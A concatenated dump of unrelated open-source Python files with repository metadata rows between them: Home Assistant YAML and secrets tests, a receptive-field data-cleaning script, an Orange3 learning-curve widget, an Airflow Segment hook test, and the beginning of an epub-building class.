doc = yaml.yaml.safe_load(file)
assert doc["key"] == "value"
with patch_yaml_files({'test.yaml': None}):
conf = 'key: !include test.yaml'
with io.StringIO(conf) as file:
doc = yaml.yaml.safe_load(file)
assert doc["key"] == {}
@patch('homeassistant.util.yaml.os.walk')
def test_include_dir_list(self, mock_walk):
"""Test include dir list yaml."""
mock_walk.return_value = [
['/tmp', [], ['two.yaml', 'one.yaml']],
]
with patch_yaml_files({
'/tmp/one.yaml': 'one',
'/tmp/two.yaml': 'two',
}):
conf = "key: !include_dir_list /tmp"
with io.StringIO(conf) as file:
doc = yaml.yaml.safe_load(file)
assert doc["key"] == sorted(["one", "two"])
@patch('homeassistant.util.yaml.os.walk')
def test_include_dir_list_recursive(self, mock_walk):
"""Test include dir recursive list yaml."""
mock_walk.return_value = [
['/tmp', ['tmp2', '.ignore', 'ignore'], ['zero.yaml']],
['/tmp/tmp2', [], ['one.yaml', 'two.yaml']],
['/tmp/ignore', [], ['.ignore.yaml']]
]
with patch_yaml_files({
'/tmp/zero.yaml': 'zero',
'/tmp/tmp2/one.yaml': 'one',
'/tmp/tmp2/two.yaml': 'two'
}):
conf = "key: !include_dir_list /tmp"
with io.StringIO(conf) as file:
assert '.ignore' in mock_walk.return_value[0][1], \
"Expecting .ignore in here"
doc = yaml.yaml.safe_load(file)
assert 'tmp2' in mock_walk.return_value[0][1]
assert '.ignore' not in mock_walk.return_value[0][1]
assert sorted(doc["key"]) == sorted(["zero", "one", "two"])
@patch('homeassistant.util.yaml.os.walk')
def test_include_dir_named(self, mock_walk):
"""Test include dir named yaml."""
mock_walk.return_value = [
['/tmp', [], ['first.yaml', 'second.yaml']]
]
with patch_yaml_files({
'/tmp/first.yaml': 'one',
'/tmp/second.yaml': 'two'
}):
conf = "key: !include_dir_named /tmp"
correct = {'first': 'one', 'second': 'two'}
with io.StringIO(conf) as file:
doc = yaml.yaml.safe_load(file)
assert doc["key"] == correct
@patch('homeassistant.util.yaml.os.walk')
def test_include_dir_named_recursive(self, mock_walk):
"""Test include dir named yaml."""
mock_walk.return_value = [
['/tmp', ['tmp2', '.ignore', 'ignore'], ['first.yaml']],
['/tmp/tmp2', [], ['second.yaml', 'third.yaml']],
['/tmp/ignore', [], ['.ignore.yaml']]
]
with patch_yaml_files({
'/tmp/first.yaml': 'one',
'/tmp/tmp2/second.yaml': 'two',
'/tmp/tmp2/third.yaml': 'three'
}):
conf = "key: !include_dir_named /tmp"
correct = {'first': 'one', 'second': 'two', 'third': 'three'}
with io.StringIO(conf) as file:
assert '.ignore' in mock_walk.return_value[0][1], \
"Expecting .ignore in here"
doc = yaml.yaml.safe_load(file)
assert 'tmp2' in mock_walk.return_value[0][1]
assert '.ignore' not in mock_walk.return_value[0][1]
assert doc["key"] == correct
@patch('homeassistant.util.yaml.os.walk')
def test_include_dir_merge_list(self, mock_walk):
"""Test include dir merge list yaml."""
mock_walk.return_value = [['/tmp', [], ['first.yaml', 'second.yaml']]]
with patch_yaml_files({
'/tmp/first.yaml': '- one',
'/tmp/second.yaml': '- two\n- three'
}):
conf = "key: !include_dir_merge_list /tmp"
with io.StringIO(conf) as file:
doc = yaml.yaml.safe_load(file)
assert sorted(doc["key"]) == sorted(["one", "two", "three"])
@patch('homeassistant.util.yaml.os.walk')
def test_include_dir_merge_list_recursive(self, mock_walk):
"""Test include dir merge list yaml."""
mock_walk.return_value = [
['/tmp', ['tmp2', '.ignore', 'ignore'], ['first.yaml']],
['/tmp/tmp2', [], ['second.yaml', 'third.yaml']],
['/tmp/ignore', [], ['.ignore.yaml']]
]
with patch_yaml_files({
'/tmp/first.yaml': '- one',
'/tmp/tmp2/second.yaml': '- two',
'/tmp/tmp2/third.yaml': '- three\n- four'
}):
conf = "key: !include_dir_merge_list /tmp"
with io.StringIO(conf) as file:
assert '.ignore' in mock_walk.return_value[0][1], \
"Expecting .ignore in here"
doc = yaml.yaml.safe_load(file)
assert 'tmp2' in mock_walk.return_value[0][1]
assert '.ignore' not in mock_walk.return_value[0][1]
assert sorted(doc["key"]) == sorted(["one", "two",
"three", "four"])
@patch('homeassistant.util.yaml.os.walk')
def test_include_dir_merge_named(self, mock_walk):
"""Test include dir merge named yaml."""
mock_walk.return_value = [['/tmp', [], ['first.yaml', 'second.yaml']]]
files = {
'/tmp/first.yaml': 'key1: one',
'/tmp/second.yaml': 'key2: two\nkey3: three',
}
with patch_yaml_files(files):
conf = "key: !include_dir_merge_named /tmp"
with io.StringIO(conf) as file:
doc = yaml.yaml.safe_load(file)
assert doc["key"] == {
"key1": "one",
"key2": "two",
"key3": "three"
}
@patch('homeassistant.util.yaml.os.walk')
def test_include_dir_merge_named_recursive(self, mock_walk):
"""Test include dir merge named yaml."""
mock_walk.return_value = [
['/tmp', ['tmp2', '.ignore', 'ignore'], ['first.yaml']],
['/tmp/tmp2', [], ['second.yaml', 'third.yaml']],
['/tmp/ignore', [], ['.ignore.yaml']]
]
with patch_yaml_files({
'/tmp/first.yaml': 'key1: one',
'/tmp/tmp2/second.yaml': 'key2: two',
'/tmp/tmp2/third.yaml': 'key3: three\nkey4: four'
}):
conf = "key: !include_dir_merge_named /tmp"
with io.StringIO(conf) as file:
assert '.ignore' in mock_walk.return_value[0][1], \
"Expecting .ignore in here"
doc = yaml.yaml.safe_load(file)
assert 'tmp2' in mock_walk.return_value[0][1]
assert '.ignore' not in mock_walk.return_value[0][1]
assert doc["key"] == {
"key1": "one",
"key2": "two",
"key3": "three",
"key4": "four"
}
@patch('homeassistant.util.yaml.open', create=True)
def test_load_yaml_encoding_error(self, mock_open):
"""Test raising a UnicodeDecodeError."""
mock_open.side_effect = UnicodeDecodeError('', b'', 1, 0, '')
with pytest.raises(HomeAssistantError):
yaml.load_yaml('test')
def test_dump(self):
"""The that the dump method returns empty None values."""
assert yaml.dump({'a': None, 'b': 'b'}) == 'a:\nb: b\n'
def test_dump_unicode(self):
"""The that the dump method returns empty None values."""
assert yaml.dump({'a': None, 'b': 'привет'}) == 'a:\nb: привет\n'
FILES = {}
def load_yaml(fname, string):
"""Write a string to file and return the parsed yaml."""
FILES[fname] = string
with patch_yaml_files(FILES):
return load_yaml_config_file(fname)
class FakeKeyring():
"""Fake a keyring class."""
def __init__(self, secrets_dict):
"""Store keyring dictionary."""
self._secrets = secrets_dict
# pylint: disable=protected-access
def get_password(self, domain, name):
"""Retrieve password."""
assert domain == yaml._SECRET_NAMESPACE
return self._secrets.get(name)
class TestSecrets(unittest.TestCase):
"""Test the secrets parameter in the yaml utility."""
# pylint: disable=protected-access,invalid-name
def setUp(self):
"""Create & load secrets file."""
config_dir = get_test_config_dir()
yaml.clear_secret_cache()
self._yaml_path = os.path.join(config_dir, YAML_CONFIG_FILE)
self._secret_path = os.path.join(config_dir, yaml.SECRET_YAML)
self._sub_folder_path = os.path.join(config_dir, 'subFolder')
self._unrelated_path = os.path.join(config_dir, 'unrelated')
load_yaml(self._secret_path,
'http_pw: pwhttp\n'
'comp1_un: un1\n'
'comp1_pw: pw1\n'
'stale_pw: not_used\n'
'logger: debug\n')
self._yaml = load_yaml(self._yaml_path,
'http:\n'
' api_password: !secret http_pw\n'
'component:\n'
' username: !secret comp1_un\n'
' password: !secret comp1_pw\n'
'')
def tearDown(self):
"""Clean up secrets."""
yaml.clear_secret_cache()
FILES.clear()
def test_secrets_from_yaml(self):
"""Did secrets load ok."""
expected = {'api_password': 'pwhttp'}
assert expected == self._yaml['http']
expected = {
'username': 'un1',
'password': 'pw1'}
assert expected == self._yaml['component']
def test_secrets_from_parent_folder(self):
"""Test loading secrets from parent foler."""
expected = {'api_password': 'pwhttp'}
self._yaml = load_yaml(os.path.join(self._sub_folder_path, 'sub.yaml'),
'http:\n'
' api_password: !secret http_pw\n'
'component:\n'
' username: !secret comp1_un\n'
' password: !secret comp1_pw\n'
'')
assert expected == self._yaml['http']
def test_secret_overrides_parent(self):
"""Test loading current directory secret overrides the parent."""
expected = {'api_password': 'override'}
load_yaml(os.path.join(self._sub_folder_path, yaml.SECRET_YAML),
'http_pw: override')
self._yaml = load_yaml(os.path.join(self._sub_folder_path, 'sub.yaml'),
'http:\n'
' api_password: !secret http_pw\n'
'component:\n'
' username: !secret comp1_un\n'
' password: !secret comp1_pw\n'
'')
assert expected == self._yaml['http']
def test_secrets_from_unrelated_fails(self):
"""Test loading secrets from unrelated folder fails."""
load_yaml(os.path.join(self._unrelated_path, yaml.SECRET_YAML),
'test: failure')
with pytest.raises(HomeAssistantError):
load_yaml(os.path.join(self._sub_folder_path, 'sub.yaml'),
'http:\n'
' api_password: !secret test')
def test_secrets_keyring(self):
"""Test keyring fallback & get_password."""
yaml.keyring = None # Ensure its not there
yaml_str = 'http:\n api_password: !secret http_pw_keyring'
with pytest.raises(yaml.HomeAssistantError):
load_yaml(self._yaml_path, yaml_str)
yaml.keyring = FakeKeyring({'http_pw_keyring': 'yeah'})
_yaml = load_yaml(self._yaml_path, yaml_str)
assert {'http': {'api_password': 'yeah'}} == _yaml
@patch.object(yaml, 'credstash')
def test_secrets_credstash(self, mock_credstash):
"""Test credstash fallback & get_password."""
mock_credstash.getSecret.return_value = 'yeah'
yaml_str = 'http:\n api_password: !secret http_pw_credstash'
_yaml = load_yaml(self._yaml_path, yaml_str)
log = logging.getLogger()
log.error(_yaml['http'])
assert {'api_password': 'yeah'} == _yaml['http']
def test_secrets_logger_removed(self):
"""Ensure logger: debug was removed."""
with pytest.raises(yaml.HomeAssistantError):
load_yaml(self._yaml_path, 'api_password: !secret logger')
@patch('homeassistant.util.yaml._LOGGER.error')
def test_bad_logger_value(self, mock_error):
"""Ensure logger: debug was removed."""
yaml.clear_secret_cache()
load_yaml(self._secret_path, 'logger: info\npw: abc')
load_yaml(self._yaml_path, 'api_password: !secret pw')
assert mock_error.call_count == 1, \
"Expected an error about logger: value"
def test_secrets_are_not_dict(self):
"""Did secrets handle non-dict file."""
FILES[self._secret_path] = (
'- http_pw: pwhttp\n'
' comp1_un: un1\n'
' comp1_pw: pw1\n')
yaml.clear_secret_cache()
with pytest.raises(HomeAssistantError):
load_yaml(self._yaml_path,
'http:\n'
' api_password: !secret http_pw\n'
'component:\n'
' username: !secret comp1_un\n'
' password: !secret comp1_pw\n'
'')
def test_representing_yaml_loaded_data():
"""Test we can represent YAML loaded data."""
files = {YAML_CONFIG_FILE: 'key: [1, "2", 3]'}
with patch_yaml_files(files):
data = load_yaml_config_file(YAML_CONFIG_FILE)
assert yaml.dump(data) == "key:\n- 1\n- '2'\n- 3\n"
def test_duplicate_key(caplog):
"""Test duplicate dict keys."""
files = {YAML_CONFIG_FILE: 'key: thing1\nkey: thing2'}
with patch_yaml_files(files):
load_yaml_config_file(YAML_CONFIG_FILE)
assert 'contains duplicate key' in caplog.text
| apache-2.0 | -1,518,754,949,115,915,300 | 37.977528 | 79 | 0.528452 | false |
gdetor/SI-RF-Structure | Statistics/clear_data.py | 1 | 5369 | # Copyright (c) 2014, Georgios Is. Detorakis ([email protected]) and
# Nicolas P. Rougier ([email protected])
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# This file is part of the source code accompany the peer-reviewed article:
# [1] "Structure of Receptive Fields in a Computational Model of Area 3b of
# Primary Sensory Cortex", Georgios Is. Detorakis and Nicolas P. Rougier,
# Frontiers in Computational Neuroscience, 2014.
#
# This script applies all the filters and cleaning techniques to the ncRFs. You
# have to use this script before any further statistical analysis to the data.
import numpy as np
from matplotlib import rc
import matplotlib.pylab as plt
from scipy.stats.stats import pearsonr
from scipy.stats.mstats import gmean
from scipy.ndimage import gaussian_filter
def locate_noise( input ):
n = input.shape[0]
data = input.copy()
count = 0
for i in range( 1,n-1 ):
for j in range( 1,n-1 ):
if data[i,j] != 0:
if data[i+1,j] != 0 and np.sign(data[i+1,j])==np.sign(data[i,j]):
count += 1
if data[i-1,j] != 0 and np.sign(data[i-1,j])==np.sign(data[i,j]):
count += 1
if data[i,j-1] != 0 and np.sign(data[i,j-1])==np.sign(data[i,j]):
count += 1
if data[i,j+1] != 0 and np.sign(data[i,j+1])==np.sign(data[i,j]):
count += 1
if count < 2:
data[i,j] = 0
count = 0
return data
# Computing the area of the receptive fields according to Dicarlo's
# protocol described in article "Structure of Receptive Fields in area 3b...
def clear_data( RFs, n ):
p = 25
Z, T = [], []
Noise = np.load( 'noise.npy' ).reshape(n*n,p,p)
cRFs = np.zeros((n*n,p,p))
for i in range( n ):
for j in range( n ):
RF = RFs[i,j,...]
# WARNING : Centering the RF
s0,s1 = np.unravel_index(np.argmax(RF),RF.shape)
RF = np.roll(RF,13-s0,axis=0)
RF = np.roll(RF,13-s1,axis=1)
# WARNING : Centering the RF
# RF += Noise[i*n+j]
# RF = gaussian_filter( RF, sigma=2.2 )
RF += 1.5*Noise[i*n+j]
RF = gaussian_filter( RF, sigma=1.5 )
abs_max = np.max( np.abs( RF ) )
RF[np.where( ( ( RF < +0.10*abs_max ) & (RF>0) ) | ( ( RF > -0.10*abs_max ) & (RF < 0) ) ) ]=0
RF = locate_noise( RF )
cRFs[i*n+j,...] = RF
exc = 50.0 * ( RF > 0).sum()/( p * p )
inh = 50.0 * ( RF < 0).sum()/( p * p )
Z.append([exc,inh])
Z = np.array(Z)
np.nan_to_num(Z)
print '------ Excitatory ------- Inhibitory -------'
print 'Minimum :', Z[:,0].min(), Z[:,1].min()
print 'Maximum :', Z[:,0].max(), Z[:,1].max()
print 'Mean :', np.mean( Z[:,0] ), np.mean( Z[:,1] )
print 'Mean :', np.mean( np.log10(Z[:,0]) ), np.mean( np.log10(Z[:,1]) )
print 'SD : ', np.std( np.log10(Z[:,0]) ), np.std( np.log10(Z[:,1]) )
print 'GMean :', gmean( Z[:,0] ), gmean( Z[:,1] )
print "Pearson cor: ", pearsonr( Z[:,0], np.abs(Z[:,1]) )
return Z, cRFs
# Computing the SNR of the receptive fields.
def snr( signal, sigma ):
k = signal.shape[0]
# Filtering the input signal
filtered_s = gaussian_filter( signal, sigma )
# Computing background noise
noise = signal - filtered_s
# Computing noise variance
noise_var = np.var( noise )
# Computing signal and noise power
signalPow = np.sum( signal**2 )/k
noisePow = np.sum( noise**2 )/k
# Computing snr and noise index
snr = 10.0 * np.log10( signalPow/noisePow )
noise_index = noise_var/np.abs(signal).max() *100.0
return snr, noise_index, filtered_s
# Main :p
if __name__=='__main__':
np.random.seed(137)
RFs = np.load('real-rfs-ref.npy').reshape(32,32,25,25)
n, size, bins = RFs.shape[0], RFs.shape[2], 70
Z, cRFs = clear_data( RFs, n )
np.save('areas-ref', Z)
np.save('cleared-rfs', cRFs)
| gpl-3.0 | -1,296,385,003,780,873,000 | 37.625899 | 106 | 0.631589 | false |
cheral/orange3 | doc/development/source/orange-demo/orangedemo/OWLearningCurveB.py | 2 | 13882 | import sys
from collections import OrderedDict
from functools import reduce
import numpy
import sklearn.cross_validation
from PyQt4.QtGui import QTableWidget, QTableWidgetItem
import Orange.data
import Orange.classification
from Orange.widgets import widget, gui, settings
from Orange.evaluation.testing import Results
class OWLearningCurveB(widget.OWWidget):
name = "Learning Curve (B)"
description = ("Takes a data set and a set of learners and shows a "
"learning curve in a table")
icon = "icons/LearningCurve.svg"
priority = 1010
# [start-snippet-1]
inputs = [("Data", Orange.data.Table, "set_dataset", widget.Default),
("Test Data", Orange.data.Table, "set_testdataset"),
("Learner", Orange.classification.Learner, "set_learner",
widget.Multiple + widget.Default)]
# [end-snippet-1]
#: cross validation folds
folds = settings.Setting(5)
#: points in the learning curve
steps = settings.Setting(10)
#: index of the selected scoring function
scoringF = settings.Setting(0)
#: compute curve on any change of parameters
commitOnChange = settings.Setting(True)
def __init__(self):
super().__init__()
# sets self.curvePoints, self.steps equidistant points from
# 1/self.steps to 1
self.updateCurvePoints()
self.scoring = [
("Classification Accuracy", Orange.evaluation.scoring.CA),
("AUC", Orange.evaluation.scoring.AUC),
("Precision", Orange.evaluation.scoring.Precision),
("Recall", Orange.evaluation.scoring.Recall)
]
#: input data on which to construct the learning curve
self.data = None
#: optional test data
self.testdata = None
#: A {input_id: Learner} mapping of current learners from input channel
self.learners = OrderedDict()
#: A {input_id: List[Results]} mapping of input id to evaluation
#: results list, one for each curve point
self.results = OrderedDict()
#: A {input_id: List[float]} mapping of input id to learning curve
#: point scores
self.curves = OrderedDict()
# GUI
box = gui.widgetBox(self.controlArea, "Info")
self.infoa = gui.widgetLabel(box, 'No data on input.')
self.infob = gui.widgetLabel(box, 'No learners.')
gui.separator(self.controlArea)
box = gui.widgetBox(self.controlArea, "Evaluation Scores")
gui.comboBox(box, self, "scoringF",
items=[x[0] for x in self.scoring],
callback=self._invalidate_curves)
gui.separator(self.controlArea)
box = gui.widgetBox(self.controlArea, "Options")
gui.spin(box, self, 'folds', 2, 100, step=1,
label='Cross validation folds: ', keyboardTracking=False,
callback=lambda:
self._invalidate_results() if self.commitOnChange else None
)
gui.spin(box, self, 'steps', 2, 100, step=1,
label='Learning curve points: ', keyboardTracking=False,
callback=[self.updateCurvePoints,
lambda: self._invalidate_results() if self.commitOnChange else None])
gui.checkBox(box, self, 'commitOnChange', 'Apply setting on any change')
self.commitBtn = gui.button(box, self, "Apply Setting",
callback=self._invalidate_results,
disabled=True)
gui.rubber(self.controlArea)
# table widget
self.table = gui.table(self.mainArea,
selectionMode=QTableWidget.NoSelection)
##########################################################################
# slots: handle input signals
def set_dataset(self, data):
"""Set the input train dataset."""
# Clear all results/scores
for id in list(self.results):
self.results[id] = None
for id in list(self.curves):
self.curves[id] = None
self.data = data
if data is not None:
self.infoa.setText('%d instances in input data set' % len(data))
else:
self.infoa.setText('No data on input.')
self.commitBtn.setEnabled(self.data is not None)
def set_testdataset(self, testdata):
"""Set a separate test dataset."""
# Clear all results/scores
for id in list(self.results):
self.results[id] = None
for id in list(self.curves):
self.curves[id] = None
self.testdata = testdata
def set_learner(self, learner, id):
"""Set the input learner for channel id."""
if id in self.learners:
if learner is None:
# remove a learner and corresponding results
del self.learners[id]
del self.results[id]
del self.curves[id]
else:
# update/replace a learner on a previously connected link
self.learners[id] = learner
# invalidate the cross-validation results and curve scores
# (will be computed/updated in `_update`)
self.results[id] = None
self.curves[id] = None
else:
if learner is not None:
self.learners[id] = learner
# initialize the cross-validation results and curve scores
# (will be computed/updated in `_update`)
self.results[id] = None
self.curves[id] = None
if len(self.learners):
self.infob.setText("%d learners on input." % len(self.learners))
else:
self.infob.setText("No learners.")
self.commitBtn.setEnabled(len(self.learners))
def handleNewSignals(self):
if self.data is not None:
self._update()
self._update_curve_points()
self._update_table()
def _invalidate_curves(self):
if self.data is not None:
self._update_curve_points()
self._update_table()
def _invalidate_results(self):
for id in self.learners:
self.curves[id] = None
self.results[id] = None
if self.data is not None:
self._update()
self._update_curve_points()
self._update_table()
def _update(self):
assert self.data is not None
# collect all learners for which results have not yet been computed
need_update = [(id, learner) for id, learner in self.learners.items()
if self.results[id] is None]
if not need_update:
return
learners = [learner for _, learner in need_update]
self.progressBarInit()
if self.testdata is None:
# compute the learning curve result for all learners in one go
results = learning_curve(
learners, self.data, folds=self.folds,
proportions=self.curvePoints,
callback=lambda value: self.progressBarSet(100 * value)
)
else:
results = learning_curve_with_test_data(
learners, self.data, self.testdata, times=self.folds,
proportions=self.curvePoints,
callback=lambda value: self.progressBarSet(100 * value)
)
self.progressBarFinished()
# split the combined result into per learner/model results
results = [list(Results.split_by_model(p_results)) for p_results in results]
for i, (id, learner) in enumerate(need_update):
self.results[id] = [p_results[i] for p_results in results]
def _update_curve_points(self):
for id in self.learners:
curve = [self.scoring[self.scoringF][1](x)[0]
for x in self.results[id]]
self.curves[id] = curve
def _update_table(self):
self.table.setRowCount(0)
self.table.setRowCount(len(self.curvePoints))
self.table.setColumnCount(len(self.learners))
self.table.setHorizontalHeaderLabels(
[learner.name for _, learner in self.learners.items()])
self.table.setVerticalHeaderLabels(
["{:.2f}".format(p) for p in self.curvePoints])
if self.data is None:
return
for column, curve in enumerate(self.curves.values()):
for row, point in enumerate(curve):
self.table.setItem(
row, column, QTableWidgetItem("{:.5f}".format(point)))
for i in range(len(self.learners)):
sh = self.table.sizeHintForColumn(i)
cwidth = self.table.columnWidth(i)
self.table.setColumnWidth(i, max(sh, cwidth))
def updateCurvePoints(self):
self.curvePoints = [(x + 1.)/self.steps for x in range(self.steps)]
def learning_curve(learners, data, folds=10, proportions=None,
random_state=None, callback=None):
if proportions is None:
proportions = numpy.linspace(0.0, 1.0, 10 + 1, endpoint=True)[1:]
def select_proportion_preproc(data, p, rstate=None):
assert 0 < p <= 1
rstate = numpy.random.RandomState(None) if rstate is None else rstate
indices = rstate.permutation(len(data))
n = int(numpy.ceil(len(data) * p))
return data[indices[:n]]
if callback is not None:
parts_count = len(proportions)
callback_wrapped = lambda part: \
lambda value: callback(value / parts_count + part / parts_count)
else:
callback_wrapped = lambda part: None
results = [
Orange.evaluation.CrossValidation(
data, learners, k=folds,
preprocessor=lambda data, p=p:
select_proportion_preproc(data, p),
callback=callback_wrapped(i)
)
for i, p in enumerate(proportions)
]
return results
def learning_curve_with_test_data(learners, traindata, testdata, times=10,
proportions=None, random_state=None,
callback=None):
if proportions is None:
proportions = numpy.linspace(0.0, 1.0, 10 + 1, endpoint=True)[1:]
def select_proportion_preproc(data, p, rstate=None):
assert 0 < p <= 1
rstate = numpy.random.RandomState(None) if rstate is None else rstate
indices = rstate.permutation(len(data))
n = int(numpy.ceil(len(data) * p))
return data[indices[:n]]
if callback is not None:
parts_count = len(proportions) * times
callback_wrapped = lambda part: \
lambda value: callback(value / parts_count + part / parts_count)
else:
callback_wrapped = lambda part: None
results = [
[Orange.evaluation.TestOnTestData(
traindata, testdata, learners,
preprocessor=lambda data, p=p:
select_proportion_preproc(data, p),
callback=callback_wrapped(i * times + t))
for t in range(times)]
for i, p in enumerate(proportions)
]
results = [reduce(results_add, res, Orange.evaluation.Results())
for res in results]
return results
def results_add(x, y):
def is_empty(res):
return (getattr(res, "models", None) is None
and getattr(res, "row_indices", None) is None)
if is_empty(x):
return y
elif is_empty(y):
return x
assert x.data is y.data
assert x.domain is y.domain
assert x.predicted.shape[0] == y.predicted.shape[0]
row_indices = numpy.hstack((x.row_indices, y.row_indices))
predicted = numpy.hstack((x.predicted, y.predicted))
actual = numpy.hstack((x.actual, y.actual))
xprob = getattr(x, "probabilities", None)
yprob = getattr(y, "probabilities", None)
if xprob is None and yprob is None:
prob = None
elif xprob is not None and yprob is not None:
prob = numpy.concatenate((xprob, yprob), axis=1)
else:
raise ValueError()
res = Orange.evaluation.Results()
res.data = x.data
res.domain = x.domain
res.row_indices = row_indices
res.actual = actual
res.predicted = predicted
res.folds = None
if prob is not None:
res.probabilities = prob
if x.models is not None and y.models is not None:
res.models = [xm + ym for xm, ym in zip(x.models, y.models)]
nmodels = predicted.shape[0]
xfailed = getattr(x, "failed", None) or [False] * nmodels
yfailed = getattr(y, "failed", None) or [False] * nmodels
assert len(xfailed) == len(yfailed)
res.failed = [xe or ye for xe, ye in zip(xfailed, yfailed)]
return res
def main(argv=sys.argv):
from PyQt4.QtGui import QApplication
app = QApplication(argv)
argv = app.argv()
if len(argv) > 1:
filename = argv[1]
else:
filename = "iris"
data = Orange.data.Table(filename)
indices = numpy.random.permutation(len(data))
traindata = data[indices[:-20]]
testdata = data[indices[-20:]]
ow = OWLearningCurveB()
ow.show()
ow.raise_()
ow.set_dataset(traindata)
ow.set_testdataset(testdata)
l1 = Orange.classification.NaiveBayesLearner()
l1.name = 'Naive Bayes'
ow.set_learner(l1, 1)
l2 = Orange.classification.LogisticRegressionLearner()
l2.name = 'Logistic Regression'
ow.set_learner(l2, 2)
l4 = Orange.classification.SklTreeLearner()
l4.name = "Decision Tree"
ow.set_learner(l4, 3)
ow.handleNewSignals()
app.exec_()
ow.set_dataset(None)
ow.set_testdataset(None)
ow.set_learner(None, 1)
ow.set_learner(None, 2)
ow.set_learner(None, 3)
ow.handleNewSignals()
return 0
if __name__=="__main__":
sys.exit(main())
| bsd-2-clause | 929,211,082,219,131,100 | 33.02451 | 96 | 0.590693 | false |
bolkedebruin/airflow | tests/providers/segment/hooks/test_segment.py | 1 | 2017 | # -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import unittest
from unittest import mock
from airflow import AirflowException
from airflow.providers.segment.hooks.segment import SegmentHook
TEST_CONN_ID = 'test_segment'
WRITE_KEY = 'foo'
class TestSegmentHook(unittest.TestCase):
def setUp(self):
super().setUp()
self.conn = conn = mock.MagicMock()
conn.write_key = WRITE_KEY
self.expected_write_key = WRITE_KEY
self.conn.extra_dejson = {'write_key': self.expected_write_key}
class UnitTestSegmentHook(SegmentHook):
def get_conn(self):
return conn
def get_connection(self, _):
return conn
self.test_hook = UnitTestSegmentHook(segment_conn_id=TEST_CONN_ID)
def test_get_conn(self):
expected_connection = self.test_hook.get_conn()
self.assertEqual(expected_connection, self.conn)
self.assertIsNotNone(expected_connection.write_key)
self.assertEqual(expected_connection.write_key, self.expected_write_key)
def test_on_error(self):
with self.assertRaises(AirflowException):
self.test_hook.on_error('error', ['items'])
if __name__ == '__main__':
unittest.main()
| apache-2.0 | 4,212,838,040,843,026,400 | 31.532258 | 80 | 0.695092 | false |
leandro86/epubcreator | epubcreator/epubbase/ebook.py | 1 | 14784 | import os
from lxml import etree
from epubcreator.pyepub.pyepubwriter import epub
from epubcreator.epubbase import ebook_metadata, ebook_data, files, images
from epubcreator.misc import utils
from epubcreator.misc.options import Options, Option
class Ebook(Options):
OPTIONS = [Option(name="includeOptionalFiles",
value=True,
description="Indica si los archivos opcionales (dedicatoria.xhtml y autor.xhtml) deben incluirse en el epub "
"incluso si los respectivos campos no fueron ingresados.")]
def __init__(self, ebookData, metadata=None, **options):
super().__init__(**options)
self._ebookData = ebookData or ebook_data.EbookData()
self._metadata = metadata or ebook_metadata.Metadata()
def save(self, file):
"""
Genera y guarda el epub.
@param file: un string con el directorio donde guardar el epub (no el nombre del
archivo, ya que este debe generarse de acuerdo a los metadatos), o un objeto file-like.
@return: el path del archivo generado, si "file" es un string. Si "file" es un objeto de tipo
file-like, se retorna el nombre de archivo del epub.
"""
outputEpub = epub.EpubWriter()
self._addEpubBaseFiles(outputEpub)
self._addSectionsAndToc(outputEpub)
self._addImages(outputEpub)
self._addMetadata(outputEpub)
epubName = self._getOutputFileName()
# Compruebo si estoy ante un string (o sea, un directorio) o un objeto file-like.
if isinstance(file, str):
fileName = os.path.join(file, epubName)
outputEpub.generate(fileName)
return fileName
else:
outputEpub.generate(file)
return epubName
def _addEpubBaseFiles(self, outputEpub):
synopsis = self._metadata.synopsis or ebook_metadata.Metadata.DEFAULT_SYNOPSIS
title = self._metadata.title or ebook_metadata.Metadata.DEFAULT_TITLE
editor = self._metadata.editor or ebook_metadata.Metadata.DEFAULT_EDITOR
coverModification = self._metadata.coverModification or ebook_metadata.Metadata.DEFAULT_COVER_MODIFICATION
coverImage = self._metadata.coverImage or images.CoverImage(files.EpubBaseFiles.getFile(files.EpubBaseFiles.COVER_IMAGE_FILENAME))
publicationYear = self._metadata.publicationDate.year if self._metadata.publicationDate else ""
authors = self._metadata.authors or [ebook_metadata.Person(ebook_metadata.Metadata.DEFAULT_AUTHOR, ebook_metadata.Metadata.DEFAULT_AUTHOR)]
author = self._getPersonsListAsText(authors)[0]
translator = self._getPersonsListAsText(self._metadata.translators)[0]
ilustrator = self._getPersonsListAsText(self._metadata.ilustrators)[0]
# Agrego los xhtml requeridos, excepto autor.xhtml, que debe ir despúes de las secciones.
outputEpub.addHtmlData(files.EpubBaseFiles.COVER_FILENAME, files.EpubBaseFiles.getFile(files.EpubBaseFiles.COVER_FILENAME))
outputEpub.addHtmlData(files.EpubBaseFiles.SYNOPSIS_FILENAME, files.EpubBaseFiles.getSynopsis(synopsis))
